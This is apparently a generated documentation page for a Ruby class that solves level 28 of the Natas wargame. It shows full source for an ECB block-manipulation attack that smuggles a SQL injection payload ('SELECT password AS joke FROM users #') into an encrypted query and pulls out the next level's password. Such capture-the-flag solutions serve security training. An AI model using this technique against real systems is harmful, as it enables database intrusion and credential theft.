Class: NatasLevel28
- Inherits:
-
NatasLevelBase
- Object
- NatasLevelBase
- NatasLevel28
- Defined in:
- lib/natas.rb
Overview
Level 28
Constant Summary collapse
- LEVEL =
28
- PAGE =
'/'
- PAGE_SEARCH =
'/search.php'
- BLOCK_SIZE =
16
- PAYLOAD =
%(SELECT password AS joke FROM users #)
Constants inherited from NatasLevelBase
NatasLevelBase::HOST, NatasLevelBase::LOGIN, NatasLevelBase::PASSWORD_LENGTH, NatasLevelBase::PORT, NatasLevelBase::WEBPASS
Instance Attribute Summary
Attributes inherited from NatasLevelBase
Instance Method Summary collapse
Methods inherited from NatasLevelBase
#get, #initialize, #level, #post
Constructor Details
This class inherits a constructor from NatasLevelBase
Instance Method Details
#exec ⇒ Object
807 808 809 810 811 812 813 814 815 816 817 818 819 820 821 822 823 824 825 826 827 828 829 830 831 832 833 834 835 836 837 838 839 840 841 |
# File 'lib/natas.rb', line 807 def exec log('Getting a blank query') data = query('') default_size = data.bytesize print_blocks(data) log('Generating new blocks') query_offset = 1 loop do data = query(' ' * query_offset) if data.bytesize > default_size + BLOCK_SIZE print_blocks(data) log("Query offset: #{query_offset}") break end query_offset += 1 end log('Generating blocks with payload') data = query("#{' ' * query_offset}#{PAYLOAD}") print_blocks(data) log('Sending encrypted payload') block_offset = (data.bytesize - default_size) / BLOCK_SIZE payload = data[(BLOCK_SIZE * block_offset)..-1] print_blocks(payload) data = post( PAGE_SEARCH, {}, { 'query' => Base64.strict_encode64(payload) } ).body match = %r(<li>(\w{32})</li>).match(data) not_found unless match found(match[1]) end |
#print_blocks(data) ⇒ Object
798 799 800 801 802 803 804 805 |
# File 'lib/natas.rb', line 798 def print_blocks(data) log("Size: #{data.bytesize}") (data.bytesize / BLOCK_SIZE).times do |i| s = i * BLOCK_SIZE e = s + BLOCK_SIZE - 1 log("Block #{i}: #{data[s..e].unpack1('H*')}") end end |
#query(text) ⇒ Object
791 792 793 794 795 796 |
# File 'lib/natas.rb', line 791 def query(text) response = post(PAGE, {}, { 'query' => text }) uri = URI.parse(response['Location']) params = URI.decode_www_form(uri.query) Base64.strict_decode64(params[0][1]) end |